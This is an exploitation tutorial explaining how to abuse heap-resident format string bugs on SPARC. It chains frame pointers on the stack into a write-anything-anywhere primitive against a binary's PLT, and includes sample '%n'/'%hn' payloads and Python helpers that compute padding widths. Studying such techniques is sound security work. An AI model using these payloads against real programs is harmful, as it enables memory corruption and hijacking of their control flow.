Exploiting heap format strings (in SPARC)

Written by : riq

1 - Introduction

Usually the format string lies on the stack. But there are cases where it is stored on the heap, and then you CAN'T see it by popping arguments off the stack.

scut (team teso) talks about these format strings in his article 'Exploiting Format String Vulnerabilities' (section 6.4).

Here I present a way to deal with these format strings in a generic way within SPARC (and big-endian machines). It may be possible to use a similar technique for i386.

2 - The stack

In the stack you will find stack frames. These stack frames have local variables, registers, pointers to previous stack frames, return addresses, etc.

Since with format strings we can see the stack, we are going to study it more carefully.

The stack frames in SPARC look more or less like the following:

          frame 0              frame 1               frame 2
         [  l0   ]     +----> [  l0   ]      +----> [  l0   ]
         [  l1   ]     |      [  l1   ]      |      [  l1   ]
            ...        |         ...         |         ...   
         [  l7   ]     |      [  l7   ]      |      [  l7   ]
         [  i0   ]     |      [  i0   ]      |      [  i0   ]
         [  i1   ]     |      [  i1   ]      |      [  i1   ]
            ...        |         ...         |         ...   
         [  i5   ]     |      [  i5   ]      |      [  i5   ]
         [  fp   ] ----+      [  fp   ]  ----+      [  fp   ]
         [  i7   ]            [  i7   ]             [  i7   ]
         [ temp 1]            [ temp 1]
                              [ temp 2]

And so on...

The fp slot of each frame holds a pointer to the caller's stack frame (frame 0's fp points to the start of frame 1, and so on). As you may guess, 'fp' means frame pointer.

The temp_N are local variables saved on the stack. Frame 1 starts where frame 0's local variables end, frame 2 starts where frame 1's local variables end, and so on.

All these frames are stored in the stack. So we can see all of these stack frames with our format strings.
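
To make the layout above concrete, here is a small sketch that maps a format string argument number to the slot it lands on. It assumes 32-bit words, that argument 1 is frame 0's l0, and that you already know how many temp words each frame has; the function name and the temp counts are mine, for illustration only.

```python
# Register save area of one frame, in the order shown in the diagram.
SAVE_AREA = (['l%d' % n for n in range(8)] +
             ['i%d' % n for n in range(6)] +
             ['fp', 'i7'])

def slot_for_argument(arg, temps_per_frame):
    """Return (frame_number, slot_name) for a 1-based argument number.

    temps_per_frame[N] is the assumed number of local words that
    follow the save area of frame N.
    """
    index = arg - 1
    for frame, temps in enumerate(temps_per_frame):
        size = len(SAVE_AREA) + temps
        if index < size:
            if index < len(SAVE_AREA):
                return frame, SAVE_AREA[index]
            return frame, 'temp %d' % (index - len(SAVE_AREA) + 1)
        index -= size
    raise ValueError('argument lies beyond the frames described')

# Frame 0 with 1 temp, frame 1 with 2 temps, as in the diagram.
print(slot_for_argument(15, [1, 2]))   # (0, 'fp')
print(slot_for_argument(18, [1, 2]))   # (1, 'l0')
```

On a real target the temp counts have to come from inspecting the stack, so treat the numbers here as placeholders.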

3 - The trick

The trick lies in the fact that every stack frame has a pointer to the previous stack frame. Furthermore, the more pointers to the stack we have, the better.

Why? Because if we have a pointer into our own stack, we can overwrite whatever it points to with any value.

3.1 - Example 1

Suppose that we want to put the value 0x1234 in frame 1's l0. We build a format string that has printed exactly 0x1234 characters by the time the argument pointer reaches frame 0's fp. At that point we place a '%n' in the format string.

Supposing that the first argument that we see is the frame 0's l0 register, we should have a format string like the following (in python):

  '%8x' * 8 +     # pop the 8 'l' registers
  '%8x' * 5 +     # pop the first 5 'i' registers (13 * 8 = 104 chars so far)
  '%4556d'  +     # pop i5 and pad the output: 104 + 4556 = 4660 = 0x1234
  '%n'            # write where fp is pointing (which is frame 1's l0)

So, after the format string has been executed, our stack should look like this:

          frame 0              frame 1 
         [  l0   ]     +----> [ 0x00001234 ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]            [  i7   ]
         [ temp 1]            [ temp 1]
                              [ temp 2]
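
The padding width does not have to be worked out by hand. Here is a minimal sketch that computes it, assuming every '%8x' prints exactly 8 characters (32-bit words) and that the padded '%d' consumes the one argument just before the pointer. The helper name is hypothetical.

```python
MIN_WIDTH = 11  # a 32-bit signed decimal can be this wide: "-2147483648"

def single_write_format(target, pops):
    """Build a format string whose final '%n' stores `target`."""
    printed = 8 * pops            # characters produced by the '%8x' pops
    width = target - printed      # what the padded '%d' must add
    if width < MIN_WIDTH:
        raise ValueError('target too small for this many pops')
    return '%8x' * pops + '%{}d'.format(width) + '%n'

fmt = single_write_format(0x1234, 13)
print(fmt[-8:])                   # %4556d%n

# Sanity check with Python's own formatting: everything before the
# '%n' must come out exactly 0x1234 characters long.
print(len(fmt[:-2] % tuple([0] * 14)) == 0x1234)   # True
```

The MIN_WIDTH guard is there because a '%d' whose value is wider than the requested width prints more characters than planned, which would throw the count off.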

3.2 - Example 2

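A bigger number, like 0x20001234, is impractical to reach with a single '%n', since the output would have to be over 500 million characters long. Instead, we should find 2 pointers that point to the same address in the stack. It should be something like this: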

          frame 0              frame 1 
         [  l0   ]     +----> [  l0   ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]     |      [  i7   ]
         [ temp 1] ----+      [ temp 1]
                              [ temp 2]

[ Note: We will not always find 2 pointers that point to the same address, though it is not rare. ]

So, our format string should look like this:

  '%8x' * 8 +     # pop the 8 'l' registers
  '%8x' * 5 +     # pop the first 5 'i' registers (104 chars so far)
  '%4556d'  +     # pop i5 and pad the output to 4660 (0x1234)
  '%n'      +     # write where fp is pointing (which is frame 1's l0)
  '%3532d'  +     # pop i7 and pad the output to 8192 (0x2000)
  '%hn'           # write through temp 1, but only the hi part this time!

And we would get the following:

          frame 0              frame 1 
         [  l0   ]     +----> [ 0x20001234 ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]     |      [  i7   ]
         [ temp 1] ----+      [ temp 1]
                              [ temp 2]
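
To check the result without a SPARC box at hand, the two writes can be replayed on a 4-byte buffer. This is only a model of what printf does, assuming big-endian 32-bit words; the widths 4556 and 3532 are the ones that make the counts come out to exactly 0x1234 and 0x2000 after 13 pops.

```python
import struct

def replay_n_then_hn(pops, first_width, second_width):
    """Model '%n' followed by '%hn' through two pointers to one word."""
    word = bytearray(4)                   # stands in for frame 1's l0
    count = 8 * pops + first_width        # output length at the '%n'
    # '%n' stores the whole count as a 32-bit big-endian word.
    struct.pack_into('>I', word, 0, count)
    count += second_width                 # output length at the '%hn'
    # '%hn' stores only 16 bits, which land on the first 2 bytes,
    # i.e. the high half on a big-endian machine.
    struct.pack_into('>H', word, 0, count & 0xffff)
    return struct.unpack('>I', word)[0]

print(hex(replay_n_then_hn(13, 4556, 3532)))   # 0x20001234
```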

3.3 - Example 3

In the case that we only have 1 pointer, we can get the same result by using 'direct access' in the format string, with %argument_number$, where 'argument_number' is a number between 1 and 30 (in Solaris). Direct access lets us use the same argument more than once.

My format string should be the following:

    '%4660d' +  # change the length to 4660 (0x1234)
    '%15$n'  +  # write where argument 15 is pointing (arg 15 is fp!)
    '%3532d' +  # change the length again, to 8192 (0x2000)
    '%15$hn'    # write again, but only the hi part!

Therefore, we would arrive at the same result:

          frame 0              frame 1 
         [  l0   ]     +----> [ 0x20001234 ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]            [  i7   ]
         [ temp 1]            [ temp 1]
                              [ temp 2]
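
The same recipe works for any value and any argument number. A minimal sketch, assuming a big-endian target, nothing printed before the first padded '%d', and a printf that accepts direct access mixed with plain conversions as described above; the function name is mine.

```python
MIN_WIDTH = 11  # a 32-bit signed decimal can be this wide

def direct_access_format(value, arg):
    """Write a 32-bit `value` through the single pointer at `arg`.

    '%n' stores the low half (and zeroes the high half), then '%hn'
    overwrites the high half through the same pointer.
    """
    low, high = value & 0xffff, (value >> 16) & 0xffff
    if low < MIN_WIDTH:
        raise ValueError('low half too small for one padded %d')
    second = (high - low) % 0x10000   # counts wrap at 16 bits for '%hn'
    if second < MIN_WIDTH:
        second += 0x10000
    return '%{}d%{}$n%{}d%{}$hn'.format(low, arg, second, arg)

print(direct_access_format(0x20001234, 15))   # %4660d%15$n%3532d%15$hn
```

Because '%hn' only looks at the low 16 bits of the count, the second width is taken modulo 0x10000, so the high half may be smaller than the low half.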

3.4 - Example 4

But it could well happen that I don't have 2 pointers that point to the same address in the stack, and the first address that points to the stack is outside the scope of the first 30 arguments. What can I do then?

Remember that with plain '%n', you can write very large numbers, like 0x00028000 and higher. You should also keep in mind that the binary's PLT is usually located at very low addresses, like 0x0002????. So, with just one pointer that points to the stack, you can get a pointer that points to the binary's PLT.

I don't believe a graphic is necessary in this example.

4 - Abusing the 4-bytes-write-anything-anywhere primitive


4.1 - Example 5

In order to get a 4-bytes-write-anything-anywhere primitive we should repeat what was done with the stack frame 0, and do it again for another stack frame, like frame 1. Our result should look something like the following:

      frame 0              frame 1               frame 2
     [  l0   ]     +----> [0x00029e8c]   +----> [0x00029e8e]
     [  l1   ]     |      [  l1   ]      |      [  l1   ]
        ...        |         ...         |         ...   
     [  l7   ]     |      [  l7   ]      |      [  l7   ]
     [  i0   ]     |      [  i0   ]      |      [  i0   ]
     [  i1   ]     |      [  i1   ]      |      [  i1   ]
        ...        |         ...         |         ...   
     [  i5   ]     |      [  i5   ]      |      [  i5   ]
     [  fp   ] ----+      [  fp   ]  ----+      [  fp   ]
     [  i7   ]            [  i7   ]      |      [  i7   ]
     [ temp 1]            [ temp 1]      |
                          [ temp 2]  ----+
                          [ temp 3]

  [ Note: This assumes that the location we want to overwrite is 0x00029e8c. ]

So, now that we have 2 pointers, one that points to 0x00029e8c and another that points to 0x00029e8e, we have finally achieved our goal! Now, we can exploit this situation just like any other format string vulnerability :)

The format string will look like this (the widths are placeholders that show the structure, not values computed for the addresses above):

    '%4640d' +  # change the length
    '%15$n'  +  # with 'direct access' I write the lower part
                # of frame 1's l0
    '%3530d' +  # change the length again
    '%15$hn' +  # overwrite the higher part
    '%9876d' +  # change the length
    '%18$hn' +  # And write like any format string exploit!


    '%8x' * 13+ # pop 13 arguments (from argument 15)
    '%6789d' +  # change length
    '%n'     +  # write lower part
    '%8x'    +  # pop
    '%1122d' +  # modify length
    '%hn'    +  # write higher part
    '%2211d' +  # modify length
    '%hn'       # And write, again, like any format string exploit.

As you can see, this was done with just one format string. But this is not always possible. If we can't build 2 pointers, we need to abuse the format string twice.

First, we build a pointer that points to 0x00029e8c. Then, we overwrite the value stored at 0x00029e8c with '%hn'.

The second time we abuse the format string, we do the same as before, but with a pointer to 0x00029e8e.
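
Once the pointers to 0x00029e8c and 0x00029e8e exist, the last stage is the usual pair of '%hn' writes. Here is a sketch that plans the two padding widths and replays them on a buffer, assuming a big-endian target. The value 0xdeadbeef and the helper names are mine, purely for illustration.

```python
import struct

MIN_WIDTH = 11  # a 32-bit signed decimal can be this wide

def plan_halfword_writes(value, printed):
    """Return [(byte_offset, pad_width), ...] for two '%hn' writes.

    `printed` is the output length before the first pad. Offset 0 is
    the target address itself (high half), offset 2 is the low half.
    """
    halves = [(0, (value >> 16) & 0xffff), (2, value & 0xffff)]
    plan = []
    for offset, half in halves:
        width = (half - printed) % 0x10000   # '%hn' keeps 16 bits only
        if width < MIN_WIDTH:
            width += 0x10000
        plan.append((offset, width))
        printed += width
    return plan

def replay(plan, printed):
    """Replay the plan against 4 bytes of big-endian memory."""
    memory = bytearray(4)
    for offset, width in plan:
        printed += width
        struct.pack_into('>H', memory, offset, printed & 0xffff)
    return struct.unpack('>I', memory)[0]

plan = plan_halfword_writes(0xdeadbeef, 0)
print(hex(replay(plan, 0)))   # 0xdeadbeef
```

When the format string has to be abused twice, the same plan applies, with one entry used per run.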

5 - Conclusion


5.1 - Is it dangerous to overwrite the l0 (of the stack frames) ?

This is not perfect, but practice shows that you should not have any problem changing the value of l0. But, should you be unlucky, you may prefer to modify the l0's that belong to the main() and _start() stack frames.

5.2 - Is this reliable ?

If you know the state of the stack, or if you know the sizes of the stack frames, it is reliable. Otherwise, this technique won't help you much.

I think that when you have to overwrite values located at addresses that contain zero bytes, this may be your only hope, since you won't be able to put a zero byte in your format string (it would truncate the string).

Also, the binary's PLT is located at a low address, and it is more reliable to overwrite the binary's PLT than libc's PLT. Why is this so? Because, I would guess, in Solaris libc changes more frequently than the binary that you want to exploit. And probably, the binary you want to exploit will never change!
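
A quick way to see the problem with zeros: pack the address the way it would have to sit inside the string, and compare it with a format string that builds the same number through the output length. This is a sketch; 0x00029e8c is the address used in Example 5 and the function names are hypothetical.

```python
import struct

def embedded_address_has_nul(address):
    """True if the raw big-endian address contains a zero byte."""
    return b'\x00' in struct.pack('>I', address)

def count_based_format(address):
    """Carry the address in the output length instead of in raw bytes.

    Assumes nothing has been printed before the padded '%d'.
    """
    return '%{}d%n'.format(address)

target = 0x00029e8c
print(embedded_address_has_nul(target))        # True
print(count_based_format(target))              # %171660d%n
print('\x00' in count_based_format(target))    # False
```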

5.3 - Can this work in i386 ?

Yes, probably. I think you may have a problem with '%n' and '%hn', since on i386 (little-endian) both of them write to the same part of the memory (the low half of the word), but I believe the rest works fine for i386.
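
The difference is easy to see by replaying '%n' followed by '%hn' at the same address under both byte orders. This is only a model of the stores, not a test on real hardware; the counts 0x1234 and 0x2000 are the ones from Example 2.

```python
import struct

def n_then_hn(byte_order, first_count, second_count):
    """Apply '%n' then '%hn' at one address and return the final word.

    byte_order is '>' for big-endian (SPARC) or '<' for
    little-endian (i386).
    """
    word = bytearray(4)
    struct.pack_into(byte_order + 'I', word, 0, first_count)
    struct.pack_into(byte_order + 'H', word, 0, second_count & 0xffff)
    return struct.unpack(byte_order + 'I', word)[0]

print(hex(n_then_hn('>', 0x1234, 0x2000)))   # 0x20001234
print(hex(n_then_hn('<', 0x1234, 0x2000)))   # 0x2000
```

On the little-endian side the '%hn' lands on the low half and destroys what '%n' wrote there, so the two-pointers-to-one-address trick would need a second pointer to address + 2 instead.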

6 - Final


6.1 - References

scut (team teso), 'Exploiting Format String Vulnerabilities': a very complete article on format strings.

6.2 - Thanks

Juliano, for letting me know that I can overwrite an address as many times as I want using 'direct access', and for other tips about format strings.

Gera, for his ideas, suggestions and fixes.

Javier, for helping me in SPARC.

Bombi, for trying her best to correct my English.

And Bruce, for correcting my English, too.

--
riq